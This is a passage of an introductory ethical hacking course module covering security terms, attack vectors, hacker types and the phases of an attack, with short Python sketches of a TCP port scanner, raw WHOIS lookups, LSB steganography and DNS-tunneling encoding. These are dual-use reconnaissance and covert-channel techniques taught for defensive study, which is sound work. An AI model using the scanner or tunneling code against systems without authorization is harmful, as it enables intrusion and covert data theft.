Ethical Hacking

23 January 2018

Ethical Hacking Course - Module 1 - Introduction to Ethical Hacking
Ethical Hacking Course, Computer Security

In module 1 of this free computer security course, we will cover all the foundations you need to become familiar with the terms used in the field of computer and information security. To help you orient yourself, there is an index of topics for this module below.

Before continuing with this introduction to computer security, I recommend that you see the
introduction to computer networks and how to build a secure network.

Full course: en.gburu.net/hack, where you will find all the topics of this free ethical hacking
course in one place.

Responsibility:
This course is intended for educational purposes, to improve your computer security skills so you can plan and design safer networks. It does not encourage illegal activities on third-party systems or networks; if you commit an illegal activity on a system or network, you do so under your own responsibility. If you want to practice and improve your ethical hacking skills, do it on systems that you own or have legal permission to test. I recommend using operating system images installed in virtual machines in a controlled environment.

Recommended: How to build a secure network, introduction to networks and their security

Agenda for Module 1 - Introduction to Ethical Hacking

 Objectives of module 1
 Essential terms
 Elements of Information Security
 Main vectors of attacks against information systems, potential threats, motives and
objectives of the attacker.
 What is the Information War?
 Threats and attacks against IPv6
 Hacker vs Ethical Hacker
 Effects of a hack against a company
 Types of Hackers
 What is Hacktivism?
 Phases of Hacking
o Phase: reconnaissance
 Reconnaissance: passive
 Reconnaissance: active
o Phase: scanning
o Phase: get access
o Phase: maintain access
o Phase: erase tracks
 What is steganography?
 Tunneling
 Types of attacks against a computer system
 What is Ethical Hacking?
 Why is Ethical Hacking necessary?
 Why do companies hire hackers?
 Scope and limitations of Ethical Hacking
 What is defense in depth?
 Information Security Controls
 Information assurance
 Threat Modeling
 Enterprise Information Security Architecture (EISA)
 Design network zones for more security
 Understand what Information Security Policies are
o classification of security policies
o structure and internal content
o Types of Security Policies
o Examples of Security Policies
o Steps to design and implement good information security policies in a company
o Privacy Policies for employees
o Involvement of Human Resources and Legal departments in security policies
 Physical Security, threats and controls
 Incident Management Responses, processes and responsibilities of an incident
management team.
 What is the Vulnerability Assessment?
o Types of vulnerability assessments
o Vulnerability assessment methodologies
 Vulnerability Research
 What is Pentesting?
o Types of Pentesting
o Why is Pentesting necessary?
o Recommended methodologies to perform a Pentesting
o Comparison: Security Audit, Vulnerability Assessment and Pentesting, what
differences do they have?
o Phases of Pentesting
o Teams: Blue vs Red

Objectives of module 1
It is important to bear in mind that attackers attack systems for various reasons, with both political and personal purposes. Therefore, it is vital to understand how malicious hackers attack systems and the probable reasons behind those attacks. As Sun Tzu wrote in The Art of War: "If you know yourself, but not the enemy, for every victory you win, you will also suffer a defeat."
It is the duty of system administrators and network security professionals to protect their
infrastructure from vulnerabilities by knowing the enemy (malicious hackers) who seek to use
the same infrastructure for illegal activities.

Ethical hacking is the process of verifying and testing an organization's network to detect gaps and vulnerabilities that attackers could use to compromise the infrastructure. The same methods a malicious hacker would use should be applied, but ethically and with care not to damage the hardware or the information being protected. Individuals or experts who perform ethical hacking are called white hats. They hack in an ethical way, without causing any damage to the computer system, and with legal permission granted by the owner of the infrastructure; it is therefore considered a legal activity. This is why computer security is one more branch of computing: thanks to these professionals, organizations and everyday people can have a little more security when they carry out their activities on the Internet. Basically, the ethical hacker is paid to stay one step ahead of malicious hackers.

Upon completion of this module you are expected to have learned the following:

 Essential terms
 Understand the elements of Information Security
 Main vectors of attacks by hackers
 Threats to Information Security
 Understand what Ethical Hacking is, the necessary skills, the scope of an ethical hacker, and what sets them apart from a malicious hacker.
 Potential effects of an attack against an organization
 Who is a hacker?
 Stages of a computer attack
 Types of attacks against a computer system
 Incident management process
 Types of Security Policies
 Vulnerability Research
 What is Penetration Testing?
Essential terms
Now let's look at the meaning of terms you will see very often if you dedicate yourself to computer security.

 Hack value: the notion among hackers that something is worth doing or is interesting. Breaking the security of the hardest network can give a hacker great satisfaction, because it is something they achieved that not everyone could do.
 Vulnerability: a weakness in the design or an implementation error that can lead to an unexpected and undesirable event that compromises the security of the system. In simple words, a vulnerability is a hole, limitation or weakness in the system that gives an attacker a way in, bypassing the various user authentication mechanisms.
 Exploit: a defined way to violate the security of a computer system through a vulnerability. The term exploit is used when any type of attack has occurred against a system or network. An exploit can also be defined as malicious software or commands that cause unexpected behavior in legitimate software or hardware by taking advantage of vulnerabilities that have already been found.
 Target of evaluation: can be a computer system, product or component that is identified
/ submitted to a required security assessment. This type of evaluation helps the evaluator
to understand the operation, technology and vulnerabilities of a particular system or
product.
 Zero-day Attack: Attacker exploits vulnerabilities in the computer application before the
software developer releases a patch for them.
 Pivoting: once an attacker obtains access to a system, they may try to take control of the entire infrastructure by pivoting, that is, moving from system to system, gaining control of each one and using it for malicious activities. This makes it difficult to identify the attacker, since they are using other people's systems to perform illegal activities.
 Payload: is the part of an exploit code that performs the desired malicious action, such as
destroying, creating backdoors and hijacking a computer.
 Doxing: publication of personal identification information about an individual compiled
from public databases and social networks.
 Bot: a software application that can be controlled remotely to run or automate predefined tasks. Lately they have become popular in politics, since they can react automatically to a topic being discussed on social networks or to an opponent who said something their operator did not like, and they tend to be aggressive.

Information Security Elements


The security of information is defined as: "A state of well-being of information and
infrastructure in which the possibility of theft, alteration and interruption of information
and services remains low or tolerable". It is based on the five main elements of:
confidentiality, integrity, availability, authenticity and non-repudiation.
 Confidentiality: it is the guarantee that the information is accessible only to those
authorized to have access. Confidentiality violations may occur due to incorrect data
handling or a hacking attempt.
 Integrity: the trustworthiness of data or resources in terms of preventing improper and unauthorized changes; the guarantee that the information is sufficiently accurate for its purpose (a short example of verifying integrity and authenticity follows this list).
 Availability: is the guarantee that the system responsible for the delivery, storage and
processing of information is accessible when authorized users require it.
 Authenticity: refers to the characteristic of a communication, document or any data that
guarantees the quality of being genuine or uncorrupted of the original. The main
authentication functions include confirming that the user is who they say they are and
guaranteeing that the message is authentic and not altered or falsified. Biometrics, smart
cards and digital certificates are used to guarantee the authenticity of data, transactions,
communications or documents.
 Non-repudiation: refers to the ability to guarantee that a party to a contract or a communication cannot deny the authenticity of their signature on a document or the sending of a message they originated. It is a way to guarantee that the sender of a message cannot deny having sent it and that the recipient cannot deny having received it.
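To make two of these elements more concrete, the following is a minimal Python sketch (the message and the shared key are made-up placeholders): a SHA-256 digest lets a recipient detect whether data was altered (integrity), and an HMAC computed with a shared secret additionally ties the message to someone who knows that secret (authenticity).

```python
import hashlib
import hmac

message = b"transfer 100 USD to account 42"   # placeholder message
shared_key = b"pre-shared-secret"             # placeholder key known only to sender and receiver

# Integrity: any change to the message changes its SHA-256 digest.
digest = hashlib.sha256(message).hexdigest()

# Authenticity: only someone holding shared_key can produce a matching HMAC tag.
tag = hmac.new(shared_key, message, hashlib.sha256).hexdigest()

def verify(received_msg: bytes, received_tag: str) -> bool:
    """Recompute the HMAC over the received message and compare it in constant time."""
    expected = hmac.new(shared_key, received_msg, hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, received_tag)

print(digest)
print(verify(message, tag))                              # True: message intact, key holder authenticated
print(verify(b"transfer 9999 USD to account 1", tag))    # False: the tampered message fails the check
```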

Triangle of Security, Functionality and Usability

Technology is evolving at an unprecedented rate. As a result, new products that reach the market
tend to be designed for easy-to-use rather than secure computing. The technology, originally
developed for "honest" research and academic purposes, has not evolved at the same pace as the
user's profile. In addition, during this evolution, system designers often overlook vulnerabilities
during the planned implementation of the system. However, increasing the built-in default
security mechanisms means that users must be more competent. As computers are increasingly
used for routine activities, it is increasingly difficult for the system administrator and other
system professionals to allocate resources exclusively to protect the systems. This includes the
time required to verify log files, detect vulnerabilities, and apply security update patches.

Routine activities consume system administrators' time, leaving less time for vigilant security administration. There is little time to implement security measures and secure computing resources on a regular and innovative basis. This has increased the demand for dedicated security professionals to constantly monitor and defend ICT (information and communication technology) resources.

Originally, "hacking" meant having extraordinary computer skills to push the limits of computer systems, and it required great proficiency. Today, however, automated tools and code available on the Internet make it possible for anyone with the will and desire to hack to succeed, although such attackers are also very likely to be detected by the authorities, since they lack the technical knowledge to remain undetectable.
A mere commitment to the security of a system does not mean that it is completely safe. There are websites that insist on "recovering the network", as well as people who believe they are doing a great favor by publishing the details of exploits. These can act to the detriment of security and can reduce the skill level required to become a successful attacker.

The ease with which system vulnerabilities are exploited has increased, while the knowledge curve needed to carry out those exploits has shortened. The concept of the elite/super hacker is an illusion; the fast-growing "script kiddie" category is largely made up of less skilled individuals with second-hand knowledge of how to carry out exploits. One of the main impediments to the growth of security infrastructure lies in the unwillingness of exploited or compromised victims to report the incident, for fear of losing the goodwill and faith of their employees, customers and partners, and/or of losing market share. The trend of information assets influencing the market has seen more companies thinking twice before reporting incidents to law enforcement, for fear of bad press and negative publicity.

The increasingly interconnected environment, where companies tend to have their website as their single point of contact, makes it essential for managers to take measures to prevent exploits that can lead to data loss. This is an important reason why companies must invest in security measures to protect their information assets.

Main attack vectors against Information Systems

An attack vector is a route or means by which an attacker gains access to an information system in order to perform malicious activities. It allows an attacker to take advantage of the vulnerabilities present in the information system to carry out a particular attack.

Although there are some traditional routes through which an attack can be made, attack vectors come in many forms; you cannot predict which form an attack vector will take.

The following are the possible main attack vectors through which attackers can attack
information systems:

 Virtualization and Cloud Computing: on-demand delivery of IT capabilities where the organization's and its clients' confidential data is stored; a flaw in one client's application can allow attackers to access other clients' data.
 Organized cyber crime
 Software not patched
 Malware targeted
 Social networks
 Internal threats
 Botnets
 Lack of cybersecurity professionals
 Network applications
 Inadequate security policies
 Mobile device security
 Compliance with Government Laws and regulations
 Complexity of the computer infrastructure
 Hacktivism
 Advanced Persistent Threat (APT): an attack that focuses on stealing information from the victim's machine without the user's knowledge; APTs are usually carried out by hacker groups backed by a nation-state, since they have large economic resources and strong technical skills.
 Mobile Threats: the focus of attackers has shifted to mobile devices due to the increased adoption of mobile devices for business and personal purposes, and the comparatively weaker security controls that administrators apply to employees' mobile devices in the organization.

Reasons, goals and objectives behind the attacks

Attackers generally have motives or objectives behind their information security attacks: disrupting the target organization's business continuity, stealing valuable information, simple curiosity, or even taking revenge on the target organization. These motives depend on the attacker's state of mind and on the reason for carrying out the activity. Once attackers determine their objective, they can attack the system, its security policy and its controls.

Reasons:

 Disrupt business continuity
 Information theft
 Manipulating data
 Creating fear and chaos by interrupting critical infrastructures
 Propagate religious or political beliefs
 Reach state military objectives
 Damaging the reputation of the target
 Taking personal revenge

Potential threats against an Information System

Threats against an information system can be very broad but it is generally divided into 5 groups
of greater relevance: natural, physical, network, host-based and applications.

 Natural: natural disasters, floods, earthquakes, hurricanes.
 Physical: loss or damage of system resources, physical intrusion, sabotage, espionage and errors.
 Network: information gathering, sniffing and eavesdropping, spoofing, session hijacking and man-in-the-middle attacks, DNS and ARP poisoning, password-based attacks, denial-of-service attacks, compromised-key attacks, and attacks against firewalls and IDS.
 Host: malware attacks, footprinting, password attacks, ddos, arbitrary code execution,
unauthorized access, escalation of privileges, backdoor attacks, physical security threats.
 Application: improper data/input validation, authentication and authorization attacks, incorrect security settings, information disclosure, broken session management, buffer overflow problems, cryptography attacks, SQL injection, and improper error and exception handling.

A network is defined as a collection of computers and other hardware connected by communication channels to share resources and information. As information travels from one computer to another through a communication channel, a malicious person may break into the channel and steal the information traveling over the network. An attacker can impose various threats on a target network.

Host threats are directed at a particular system on which valuable information resides. Attackers attempt to violate the security of that information system resource.

Application threats: if appropriate security measures are not taken during the development of a particular application, it may be vulnerable to different types of application attacks. Attackers exploit vulnerabilities in the application to steal or damage system information.

Attacks against an operating system

Operating system attacks: attackers look for vulnerabilities in the design, installation or configuration of operating systems and exploit them to gain access to a system, for example buffer overflow vulnerabilities, bugs in the operating system, an unpatched operating system, etc.

Misconfiguration attacks: misconfiguration vulnerabilities affect web servers, application platforms, databases, networks or frameworks, and can result in illegal access or even full takeover of the system; leaving the default configuration in place is a common and serious security error.

Application-level attacks: attackers exploit vulnerabilities in applications running in the organization's information systems to gain unauthorized access and steal or manipulate data.

Shrink-wrap code attacks: attackers exploit default settings, library configurations and off-the-shelf code.

Information Warfare

The term information warfare refers to the use of information and communication technologies
(ICT) to take competitive advantage over an opponent.
Defensive information warfare: refers to all strategies and actions to defend against attacks
against ICT assets.

Offensive information warfare: refers to information warfare that involves attacks against the
assets of an opponent's ICT.

Governments around the world see the Internet as a new battlefield, whether for spying, for sabotaging an enemy's essential infrastructure such as the electrical grid, or simply for political propaganda. That is why new institutions, both civilian and military, have been created to counter computer attacks and to carry them out as well.

In the image we can see three US agencies dedicated to offensive (hacking) and defensive computing: the U.S. Cyber Command, the National Security Agency (NSA) and the Central Security Service.

IPv6 Security Threats

Compared with IPv4, IPv6 has an improved security mechanism that guarantees a higher level of security and confidentiality for the information transferred over a network. However, IPv6 is still vulnerable and still faces information security threats, including the following:

 Automatic configuration: IPv6 allows automatic configuration of IP networks, which can leave the user vulnerable to attacks if the network is not configured correctly and securely from the beginning.
 Unavailability of reputation-based protection: current security solutions use the reputation of IP addresses to filter out known malware sources; vendors will take time to develop reputation-based protection for IPv6.
 Incompatibility of logging systems: IPv6 uses 128-bit addresses, which are stored as a 39-character string, while IPv4 addresses fit in a 15-character field; logging solutions designed for IPv4 may not work on IPv6-based networks (see the small example after this list).
 Rate limiting problem: administrators use rate limiting strategies to slow down automated attack tools; however, it is not practical to apply rate limits at the level of 128-bit addresses.
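As a quick illustration of the storage difference mentioned above, Python's standard ipaddress module shows the length of both address formats (both addresses come from documentation ranges):

```python
from ipaddress import ip_address

v4 = ip_address("203.0.113.254")                            # documentation-range IPv4 address
v6 = ip_address("2001:0db8:85a3:0000:0000:8a2e:0370:7334")  # documentation-range IPv6 address

print(str(v4), len(str(v4)))          # an IPv4 address needs at most 15 characters
print(v6.exploded, len(v6.exploded))  # a fully expanded IPv6 address needs 39 characters
```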

The following IPv6 security threats can also cause serious damage to your network:

Translation problems from IPv4 to IPv6: translation of IPv4 traffic to IPv6 can result in poor
implementation and can provide a potential attack vector.

Security information and event management (SIEM) problems: each IPv6 host can have multiple IPv6 addresses simultaneously, which complicates log and event correlation.
Denial of service (DoS): overloading network security and control devices can significantly reduce the availability threshold of network resources, leading to DoS attacks.

Abuse of network discovery: advanced IPv6 network discovery features can be exploited by attackers to traverse your network and access restricted resources.

Hacker vs. Ethical Hacker


Most people do not understand the difference between hacker and ethical hacker. These two
terms can be differentiated according to the intentions of the people who carry out hacking
activities. However, understanding the true intentions of hackers can be quite difficult.

Hacker (malicious): exploits system vulnerabilities and compromises security controls to obtain unauthorized or inappropriate access to system resources. This involves modifying system or application features to achieve a goal outside the creator's original purpose; their activity is illegal.

Hacker (ethical): implies the use of hacking tools, tricks and techniques to identify
vulnerabilities in order to guarantee the security of the system. It focuses on the simulation
techniques used by attackers to verify the existence of exploitable vulnerabilities in the security
of the system with a legal permission to carry out their activities.

Effects of malicious hacking on businesses

According to the 2012 Symantec State of Information Survey, information costs businesses around the world $1.1 trillion annually. Each company must provide solid security for its
customers, otherwise the company can put its reputation at risk and even face lawsuits. Attackers
use hacking techniques to steal and redistribute the intellectual property of companies and, in
turn, obtain financial gains. Attackers can make a profit, but the victim company must face huge
financial losses and lose its reputation.

Once an attacker gains control over the user's system, they can access all files stored on the
computer, including personal or corporate financial information, credit card numbers and
customer data stored in that system. If such information falls into the wrong hands, it can create
chaos in the normal functioning of an organization.
Organizations must provide strong security to their critical information sources that contain
customer data and their upcoming releases or ideas. If the data is altered or stolen, a company
can lose credibility and the trust of its customers. In addition to the possible financial loss that
can occur, the loss of information can cause a company to lose a crucial competitive advantage
over its rivals. Sometimes attackers use botnets to launch DoS attacks, viruses and other web-based attacks. This causes the target's business services to go down, which in turn can lead to loss of revenue.

There are many things that companies can do to protect themselves and protect their assets.
Knowledge is a key component to address this problem. The assessment of the prevailing risk in
a business and how attacks could potentially affect that business is paramount from the point of
view of security. One does not have to be a security expert to recognize the damage that can
occur when a company is victimized by an attacker. By understanding the problem and
empowering employees to facilitate protection against attacks, the company could face any
security issues as they arise.

A hacker (malicious hacker) is a person who illegally enters a system or network without authorization to destroy it, steal confidential data or perform malicious attacks. Hackers can be motivated by a multitude of reasons:

 Smart individuals with excellent computer skills, with the ability to create and explore the
software and hardware of computers.
 For some hackers, hacking is a hobby, to see how many computers or networks they can compromise.
 Their intention may be to gain knowledge, or just to poke around doing illegal things.
 Some hack with malicious intent, for example to steal business data, credit card information, social security numbers, email passwords, etc.

Types of Hackers

 Black Hats: are individuals with extraordinary computer skills who resort to malicious or
destructive activities and are also known as crackers. These people mainly use their skills
only for destructive activities, causing great losses for both companies and individuals.
They use their skills to find vulnerabilities in various networks, including defense and
government websites, banking and finance, etc. Some do it to cause damage, steal information, corrupt data or make easy money by hacking bank customers' accounts.
 White Hats: are individuals who possess hacking skills and use them for
defensive purposes, they are also known as computer security analysts. These days,
almost all companies have computer security analysts to defend their systems against
malicious attacks. White hats help companies protect their networks from outside
intruders, this course is focused on becoming a white hat.

Image: parody of the "friendly" relationship between computer security analysts and malicious
hackers.

 Gray Hats: are individuals who work both offensively and defensively at different times.
The gray hats fall between the black and white hats. Gray hats could help hackers to find
various vulnerabilities in a system or network and, at the same time, help providers to
improve products (software or hardware) by checking the limitations and making it more
secure, etc.
 Suicide Hackers: are people who want to bring down a critical infrastructure for a "cause" and are not worried about facing 30 years in prison for their actions. Suicide
hackers are closely related to suicide bombers, who sacrifice their lives for the attack and
are not worried about the consequences of their actions. There has been an increase in
cyber terrorism in recent years.
 Script kiddies: are unskilled hackers who compromise systems by running scripts,
tools and software developed by real hackers. They use small and easy to use programs or
scripts, as well as distinguished techniques to find and exploit the vulnerabilities of a
machine. Script kiddies usually focus on the number of attacks rather than on the quality
of the attacks they initiate.
 Spy Hackers: are people who are employed by an organization to penetrate and obtain
commercial secrets from the competitor. These experts can take advantage of the
privileges they have to hack into a system or network.
 Cyber terrorist: could be people, organized groups formed by terrorist organizations,
who have a wide range of skills, motivated by religious or political reasons to create fear
by the large-scale disruption of computer networks. This type of hacker is more dangerous, as they can attack not only a website but also entire areas of the Internet.
 State-sponsored hackers: are people employed by a government to penetrate and obtain top-secret information and to damage the information systems of other governments. This class can include white hats working for government or military agencies as well as highly skilled computer criminals hired by a state.
 Hacktivist: individuals who promote a political agenda through hacking, especially by defacing or disabling websites; a very famous hacktivist group is "Anonymous".

Hacktivism

Hacktivism is the act of promoting a political agenda through hacking, especially by defacing or disabling websites. A person who does these things is known as a hacktivist.

 Hacktivism thrives in environments where information is easily accessible
 Their goal is to send a message through their hacking activities and gain visibility for a cause
 Common targets include government agencies, multinational corporations, or any other entity perceived as "bad" or "wrong" by these groups or individuals
 However, it remains a fact that gaining unauthorized access is a crime, no matter what the intent is
 Hacktivism is motivated by revenge, political or social reasons, ideology, vandalism,
protest and the desire to humiliate the victims.

Hacking Phases
Hacking has five main phases: reconnaissance, scanning, gaining access, maintaining access and erasing tracks. Below we will look at each of these phases in more detail, as they are carried out in a proper hack.

1. Reconnaissance

Reconnaissance refers to the preparatory phase in which an attacker gathers as much information as possible about the target before launching the attack. It is the most important phase: doing it well gives you more information about the target and therefore a better chance of success. Abraham Lincoln's phrase "Give me six hours to chop down a tree and I will spend the first four sharpening the axe" applies here, since it is advisable to spend more time on reconnaissance of the target than on the attack itself. There are two types of reconnaissance: passive and active.

Also in this phase, the attacker resorts to competitive intelligence to learn more about the
objective. This phase may also involve network scanning, either external or internal, without
authorization.

This is the phase that allows the potential attacker to devise strategies for the attack. It may take some time while the attacker waits to discover crucial information. Part of this reconnaissance may involve "social engineering". A social engineer is a person who smoothly talks people into revealing information such as unlisted phone numbers, passwords and other confidential information.

Another reconnaissance technique is dumpster diving, the process of searching an organization's trash for discarded confidential information. Attackers can use the Internet to obtain information such as employee contact details, business partners, technologies in use and other critical business knowledge, but dumpster diving can provide even more sensitive information, such as usernames, passwords, credit card statements, bank statements, ATM receipts, social security numbers and telephone numbers. The scope of reconnaissance can include the target organization's clients, employees, operations, networks and systems. To avoid this, do not throw away sensitive or accounting documents as they are; make sure to destroy them or leave them in a state that cannot be read or deciphered.

For example, a Whois database can provide information about Internet addresses, domain names and contacts. If a potential attacker obtains DNS information from the registrar, they can obtain useful information such as the mapping of domain names to IP addresses, mail servers and host information records. It is important that a company has appropriate policies in place to protect its information assets and also provides guidelines for its users. Raising awareness about the precautions users must take to protect their information assets is a critical factor in this context.
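As one example of passive reconnaissance, WHOIS itself is a very simple protocol (RFC 3912): open a TCP connection to port 43 of a WHOIS server, send the domain name, and read the reply. The sketch below is a minimal Python version; it assumes the .com registry server whois.verisign-grs.com and queries the reserved domain example.com, and you should only query infrastructure you are allowed to query.

```python
import socket

def whois_query(domain: str, server: str = "whois.verisign-grs.com", port: int = 43) -> str:
    """Minimal WHOIS lookup (RFC 3912): connect to TCP/43, send the domain, read the full reply."""
    with socket.create_connection((server, port), timeout=10) as s:
        s.sendall((domain + "\r\n").encode())
        chunks = []
        while True:
            data = s.recv(4096)
            if not data:          # the server closes the connection when the answer is complete
                break
            chunks.append(data)
    return b"".join(chunks).decode(errors="replace")

if __name__ == "__main__":
    print(whois_query("example.com"))
```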

Reconnaissance techniques can be broadly categorized into active and passive reconnaissance.

When an attacker approaches the attack using passive reconnaissance techniques, they do not interact directly with the target system; the attacker relies on publicly available information, social engineering and dumpster diving to gather information.

Passive reconnaissance: involves acquiring information without interacting directly with the target, for example by searching public records or news releases.
When an attacker uses active reconnaissance techniques, they interact with the target system using tools to detect open ports, accessible hosts, router locations, network mapping, and details of operating systems and applications; this also means they can be detected.

The next phase of the attack is scanning, which is discussed in the next section. Some experts do not differentiate scanning from active reconnaissance; however, there is a slight difference, since scanning involves deeper probing by the attacker. The reconnaissance and scanning phases often overlap, and it is not always possible to delimit them as watertight compartments.

Active reconnaissance is generally used when the attacker judges that there is a low probability of these reconnaissance activities being detected. Novices and script kiddies are often found trying to get quick, visible results, sometimes just for the bragging value they can obtain.

Active reconnaissance: involves interacting directly with the target by any means, for example phone calls to the help desk or technical department.

As an ethical hacker, you must be able to distinguish between the various reconnaissance methods and advocate preventive measures in light of potential threats. Companies, for their
part, must address security as an integral part of their business and / or operational strategy, and
must be equipped with adequate policies and procedures to verify such activities.

2. Scanning

Scanning is what an attacker does before attacking the network. When scanning, the attacker uses the details gathered during reconnaissance to identify specific vulnerabilities; scanning can be considered a logical extension (and overlap) of active reconnaissance. Often, attackers use
automated tools such as network / host scanners to locate systems and attempt to discover
vulnerabilities.

An attacker can gather critical network information, such as the mapping of systems, routers and firewalls, by using simple tools such as traceroute. Alternatively, they can use tools like Cheops to add sweeping functionality on top of what traceroute provides.

Port scanners can be used to detect listening ports and find information about the nature of the
services running on the target machine. The main defense technique in this sense is to close the
services that are not necessary. Appropriate filtering can also be adopted as a defense
mechanism. However, attackers can still use tools to determine the rules implemented for
filtering.

The most commonly used tools are vulnerability scanners that can search for several known
vulnerabilities in a target network and potentially detect thousands of vulnerabilities. This gives
the attacker the advantage of time, because he or she only has to find a single means of entry, while the systems professional must secure many vulnerable areas by applying patches.
Organizations that implement intrusion detection systems (IDS) still have cause for concern
because attackers can use evasion techniques at both the application and network level.

Scanning is the part where the attacker tries to obtain more information but can no longer stay hidden, so they can be detected. In this phase, tools such as network mappers, ping tools and vulnerability scanners are used, among others. The goal is to collect more accurate information about the systems within the infrastructure, such as the number of devices on the network, their operating systems, the types and states of open ports, device types, etc.
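As a rough sketch of what a port scanner does under the hood, the snippet below attempts a full TCP connect() to a handful of common ports. It is far less capable (and far noisier) than real tools such as Nmap, and it should only be pointed at hosts you own or are explicitly authorized to test; here it targets localhost.

```python
import socket

def scan_ports(host: str, ports, timeout: float = 0.5):
    """Very small TCP connect() scanner: return the ports that accept a connection."""
    open_ports = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            if s.connect_ex((host, port)) == 0:   # 0 means the TCP handshake succeeded
                open_ports.append(port)
    return open_ports

if __name__ == "__main__":
    # Only scan hosts you own or have written permission to test.
    print(scan_ports("127.0.0.1", [22, 80, 443, 3306, 8080]))
```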

3. Get access

Gaining access is the most important phase of an attack in terms of potential damage. It refers to the point where the attacker gains access to the operating system or applications on the computer or network; access can be obtained at the operating system level, the application level or the network level. Factors that influence the chances of an attacker gaining access to a target system include the architecture and configuration of the target system, the skill level of the perpetrator, and the initial level of access obtained. The attacker initially tries to gain minimal access to the target system or network. Once they gain access, they try to escalate their privileges to obtain complete control of the system; in the process, intermediate systems connected to it are also compromised.

Attackers do not always need to gain access to a system to cause damage; for example, denial-of-service attacks can deplete resources or prevent services from running on the target system. A service can be stopped by killing processes, using a logic/time bomb, or even reconfiguring and crashing the system. Resources can also be exhausted locally by filling up the outgoing communication links.

The exploit can occur locally, offline, over a LAN or over the Internet, and can take the form of deception or theft; examples include stack-based buffer overflows, denial of service and session hijacking. Attackers also use a technique called spoofing to exploit the system by pretending to be someone else.

4. Keep access

Once an attacker gains access to the target system, they can choose to use the system and its resources, use the system as a launch pad to explore and exploit other systems, or maintain a low profile and continue exploiting the system quietly. All of these actions can damage the organization. For example, the attacker can deploy a sniffer to capture all network traffic, including telnet and ftp sessions with other systems.
Attackers, who choose not to be detected, remove evidence of their entry and use a backdoor or
trojan to gain repeated access. They can also install rootkits in the kernel to get superuser access.
The reason behind this is that rootkits get access at the operating system level while a Trojan
horse gets access at the application level. Both the rootkits and the Trojans depend on the users
to install them. Within the Windows system, most Trojans are installed as a service and run as a
local system, which has administrative access.

Attackers can use Trojans to transfer usernames, passwords and even credit card information
stored in the system. They can maintain control of their system for a long time by "hardening
the system" against other attackers, and sometimes, in the process, they can provide some degree
of protection to the system from other attacks. They can then use their access to steal data,
consume CPU cycles and exchange confidential information or even resort to extortion.

Organizations can use intrusion detection systems or deploy honeypots and honeynets to detect intruders. However, the latter is not recommended unless the organization has the security professionals required to leverage the concept for protection.

5. Erase tracks

An attacker wants to destroy evidence of their presence and activities for several reasons, such as maintaining access and evading punitive action. Trojaned versions of utilities such as ps or netcat are useful for any attacker who wants to destroy evidence in log files or replace system binaries. Once the Trojans are in place, the attacker can use them to hide their presence: when such a script runs, a variety of critical files are replaced by trojaned versions, hiding the attacker in seconds. Other techniques include steganography and tunneling.

Steganography is the process of hiding data, for example in images and sound files.
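A minimal sketch of the idea, assuming a plain byte string standing in for image pixel data: the secret is spread across the least significant bit of each cover byte, which barely changes the cover yet still allows exact recovery.

```python
def hide(cover: bytes, secret: bytes) -> bytes:
    """Write each bit of 'secret' into the least significant bit of successive cover bytes."""
    bits = [(byte >> i) & 1 for byte in secret for i in range(7, -1, -1)]
    if len(bits) > len(cover):
        raise ValueError("cover is too small to hold the secret")
    out = bytearray(cover)
    for i, bit in enumerate(bits):
        out[i] = (out[i] & 0xFE) | bit
    return bytes(out)

def reveal(stego: bytes, length: int) -> bytes:
    """Read back 'length' hidden bytes from the least significant bits of the stego data."""
    bits = [b & 1 for b in stego[:length * 8]]
    return bytes(
        sum(bit << (7 - j) for j, bit in enumerate(bits[i:i + 8]))
        for i in range(0, length * 8, 8)
    )

if __name__ == "__main__":
    cover = bytes(range(256)) * 4      # stand-in for raw pixel data
    stego = hide(cover, b"hello")
    print(reveal(stego, 5))            # b'hello'
```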

Tunneling takes advantage of a transmission protocol by carrying one protocol over another; even the spare space (unused bits) in TCP and IP headers can be used to hide information. An attacker can use a compromised system as a relay to reach other systems on the network without being detected. This attack phase can therefore turn into a new attack cycle, using reconnaissance techniques once again.
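As a purely conceptual sketch of the tunneling idea (no packets are sent), the snippet below packs arbitrary data into label-sized chunks of a DNS-style query name, which is roughly how DNS tunneling tools smuggle one protocol's data inside another; the carrier domain is a made-up placeholder.

```python
import base64

def to_dns_labels(data: bytes, domain: str = "tunnel.example.com", label_size: int = 40) -> str:
    """Base32-encode data and split it into DNS-label-sized chunks prefixed to a carrier domain."""
    encoded = base64.b32encode(data).decode().rstrip("=").lower()
    chunks = [encoded[i:i + label_size] for i in range(0, len(encoded), label_size)]
    return ".".join(chunks + [domain])

if __name__ == "__main__":
    print(to_dns_labels(b"data smuggled inside a DNS query name"))
```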

There have been cases in which an attacker has lurked on a system even after system administrators changed security policies. System administrators can deploy host-based IDS (HIDS) and antivirus tools that can detect Trojans and other apparently benign files and directories. As an ethical hacker, you must know the tools and techniques deployed by attackers so you can advocate for and take measures to ensure protection. In the following modules we will cover this in much more depth.
Types of Attacks
There are several ways in which an attacker can gain access to a system. The attacker must be able to exploit a weakness or vulnerability in the system:

 Operating system attacks: attackers look for operating system vulnerabilities and
exploit them to gain access to a system on the network.
 Attacks at application level: software applications come with innumerable functions and features, and there is often not enough time to test them fully before products are launched. These applications therefore carry several vulnerabilities and become a source of attack.
 Misconfiguration attacks: most administrators do not have the necessary skills to maintain or troubleshoot systems, which can lead to configuration errors. Such configuration errors can become entry points for an attacker into the target network or system.
 Shrink-wrap code attacks: operating systems and applications come with numerous sample scripts to simplify administrators' work, but those same scripts contain several vulnerabilities, which can lead to shrink-wrap code attacks.

What is ethical hacking?


Ethical hacking involves the use of hacking tools, tricks and techniques to identify vulnerabilities in order to guarantee the security of the system, focusing on simulating the techniques used by attackers to verify the existence of exploitable vulnerabilities in the company's infrastructure. Ethical hackers perform security assessments of an organization with the permission of the stakeholders interested in obtaining or improving the security of the business; the activities of an ethical hacker are therefore the same as those of a malicious hacker, but carried out legally and in a controlled environment.

Why is ethical hacking necessary?


To beat a malicious hacker, you must think like one!

Ethical hacking is necessary, since it allows you to counteract malicious hacker attacks by
anticipating the methods used by them to enter a system. There is rapid growth in technology, so
there is a growth in the risks associated with technology. Ethical hacking helps to predict the
various possible vulnerabilities well in advance and to solve them without suffering an attack
from a third party.

 Ethical hacking: hacking involves creative thinking; vulnerability testing and security audits alone cannot guarantee that the network is secure.
 Defense in depth strategy: to achieve real assurance, organizations must implement a "defense in depth" strategy and penetrate their own networks to estimate vulnerabilities and expose them.
 Counter attacks: Ethical hacking is necessary because it allows you to counteract the
attacks of malicious hackers by anticipating methods they can use to enter a system.
Reasons why organizations recruit ethical hackers

